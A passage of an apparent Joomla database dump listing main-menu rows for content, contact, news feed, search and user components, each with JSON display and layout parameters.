00:00:00',0,2,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',139,140,0,'*',0),(229,'mainmenu','Single Contact','single-contact','','joomla/contact-component/single-contact','index.php?option=com_contact&view=contact&id=1','component',-2,270,3,8,0,'0000-00-00 00:00:00',0,1,'',0,'{\"presentation_style\":\"\",\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"show_tags\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',81,82,0,'*',0),(251,'mainmenu','Contact Categories','contact-categories','','joomla/contact-component/contact-categories','index.php?option=com_contact&view=categories&id=16','component',-2,270,3,8,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_base_description\":\"\",\"categories_description\":\"\",\"maxLevelcat\":\"\",\"show_empty_categories_cat\":\"\",\"show_subcat_desc_cat\":\"\",\"show_cat_items_cat\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"-1\",\"show_empty_categories\":\"\",\"show_subcat_desc\":\"\",\"show_cat_items\":\"\",\"filter_field\":\"\",\"show_pagination_limit\":\"\",\"show_headings\":\"\",\"show_position_headings\":\"\",\"show_email_headings\":\"\",\"show_telephone_headings\":\"\",\"show_mobile_headings\":\"\",\"show_fax_headings\":\"\",\"show_suburb_headings\":\"\",\"show_state_headings\":\"\",\"show_country_headings\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"presentation_style\":\"sliders\",\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"1\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"show_feed_link\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',77,78,0,'*',0),(252,'mainmenu','News Feed Categories','new-feed-categories','','joomla/other-components/news-feeds-component/new-feed-categories','index.php?option=com_newsfeeds&view=categories&id=0','component',-2,267,4,17,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_base_description\":\"\",\"categories_description\":\"\",\"maxLevelcat\":\"\",\"show_empty_categories_cat\":\"\",\"show_subcat_desc_cat\":\"\",\"show_cat_items_cat\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_subcat_desc\":\"\",\"show_cat_items\":\"\",\"filter_field\":\"\",\"show_pagination_limit\":\"\",\"show_headings\":\"\",\"show_articles\":\"\",\"show_link\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',98,99,0,'*',0),(253,'mainmenu','News Feed Category','news-feed-category','','joomla/other-components/news-feeds-component/news-feed-category','index.php?option=com_newsfeeds&view=category&id=17','component',-2,267,4,17,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"-1\",\"show_empty_categories\":\"\",\"show_subcat_desc\":\"\",\"show_cat_items\":\"\",\"filter_field\":\"\",\"show_pagination_limit\":\"\",\"show_headings\":\"\",\"show_articles\":\"\",\"show_link\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\",\"feed_display_order\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',102,103,0,'*',0),(254,'mainmenu','Single News Feed','single-news-feed','','joomla/other-components/news-feeds-component/single-news-feed','index.php?option=com_newsfeeds&view=newsfeed&id=4','component',-2,267,4,17,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"show_tags\":\"\",\"feed_character_count\":\"0\",\"feed_display_order\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',100,101,0,'*',0),(255,'mainmenu','Search','search','','joomla/other-components/search','index.php?option=com_search&view=search','component',-2,268,3,19,0,'0000-00-00 00:00:00',0,1,'',0,'{\"search_areas\":\"1\",\"show_date\":\"1\",\"searchphrase\":\"0\",\"ordering\":\"newest\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',109,110,0,'*',0),(257,'mainmenu','Single Article','single-article','','joomla/content-component/single-article','index.php?option=com_content&view=article&id=73','component',-2,266,3,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',65,66,0,'*',0),(259,'mainmenu','Article Category Blog','article-category-blog','','joomla/content-component/article-category-blog','index.php?option=com_content&view=category&layout=blog&id=79','component',-2,266,3,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"0\",\"show_description_image\":\"0\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"4\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"2\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"1\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',67,68,0,'*',0),(260,'mainmenu','Article Category List','article-category-list','','joomla/content-component/article-category-list','index.php?option=com_content&view=category&id=19','component',-2,266,3,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_category_heading_title\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"show_pagination_limit\":\"\",\"filter_field\":\"\",\"show_headings\":\"\",\"list_show_date\":\"\",\"date_format\":\"\",\"list_show_hits\":\"\",\"list_show_author\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"alpha\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"display_num\":\"10\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',69,70,0,'*',0),(262,'mainmenu','Featured Articles','featured-articles','','joomla/content-component/featured-articles','index.php?option=com_content&view=featured','component',-2,266,3,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"featured_categories\":[\"\"],\"layout_type\":\"blog\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"4\",\"multi_column_order\":\"1\",\"orderby_pri\":\"\",\"orderby_sec\":\"front\",\"order_date\":\"\",\"show_pagination\":\"2\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"1\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',71,72,0,'*',0),(263,'mainmenu','Submit Article','submit-article','','joomla/content-component/submit-article','index.php?option=com_content&view=form&layout=edit','component',-2,266,3,22,0,'0000-00-00 00:00:00',0,3,'',0,'{\"enable_category\":\"0\",\"catid\":\"19\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',73,74,0,'*',0),(266,'mainmenu','Content Component','content-component','','joomla/content-component','#','url',-2,280,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',64,75,0,'*',0),(267,'mainmenu','News Feeds Component','news-feeds-component','','joomla/other-components/news-feeds-component','index.php?option=com_content&view=article&id=60','component',-2,268,3,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"Newsfeeds Categories View \",\"show_page_heading\":1,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"left\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',97,104,0,'*',0),(268,'mainmenu','Other Components','other-components','','joomla/other-components','#','url',-2,280,2,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',96,111,0,'*',0),(270,'mainmenu','Contact Component','contact-component','','joomla/contact-component','#','url',-2,280,2,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',76,85,0,'*',0),(271,'mainmenu','Users Component','users-component','','joomla/users-component','#','url',-2,280,2,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',86,95,0,'*',0),(275,'mainmenu','Contact Single Category','contact-single-category','','joomla/contact-component/contact-single-category','index.php?option=com_contact&view=category&catid=26&id=36','component',-2,270,3,8,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"-1\",\"show_empty_categories\":\"\",\"show_subcat_desc\":\"\",\"show_cat_items\":\"\",\"filter_field\":\"\",\"show_pagination_limit\":\"\",\"show_headings\":\"\",\"show_position_headings\":\"\",\"show_email_headings\":\"\",\"show_telephone_headings\":\"\",\"show_mobile_headings\":\"\",\"show_fax_headings\":\"\",\"show_suburb_headings\":\"\",\"show_state_headings\":\"\",\"show_country_headings\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"initial_sort\":\"\",\"presentation_style\":\"sliders\",\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"1\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"show_feed_link\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',79,80,0,'*',0),(276,'mainmenu','Search Components','search-component','','joomla/other-components/search-component','index.php?option=com_content&view=article&id=39','component',-2,268,3,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"left\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',105,106,0,'*',0),(278,'mainmenu','Blog','blog','','blog','index.php?option=com_content&view=category&layout=blog&id=79','component',-2,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"1\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"278\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',37,44,0,'*',0),(279,'mainmenu','Pages','pages','','pages','#','url',-2,1,1,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',29,34,0,'*',0),(280,'mainmenu','Joomla!','joomla','','joomla','#','url',-2,1,1,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menulayout\":\"{\\\"width\\\":800,\\\"menuItem\\\":4,\\\"menuAlign\\\":\\\"full\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":3,\\\"menuParentId\\\":\\\"266\\\",\\\"moduleId\\\":\\\"\\\"},{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":3,\\\"menuParentId\\\":\\\"270\\\",\\\"moduleId\\\":\\\"\\\"},{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":3,\\\"menuParentId\\\":\\\"271\\\",\\\"moduleId\\\":\\\"\\\"},{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":3,\\\"menuParentId\\\":\\\"268\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"1\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',63,112,0,'*',0),(402,'mainmenu','Login Form','login-form','','joomla/users-component/login-form','index.php?option=com_users&view=login','component',-2,271,3,25,0,'0000-00-00 00:00:00',0,1,'',0,'{\"login_redirect_url\":\"\",\"logindescription_show\":\"1\",\"login_description\":\"\",\"login_image\":\"\",\"logout_redirect_url\":\"\",\"logoutdescription_show\":\"1\",\"logout_description\":\"\",\"logout_image\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',87,88,0,'*',0),(403,'mainmenu','User Profile','user-profile','','joomla/users-component/user-profile','index.php?option=com_users&view=profile','component',-2,271,3,25,0,'0000-00-00 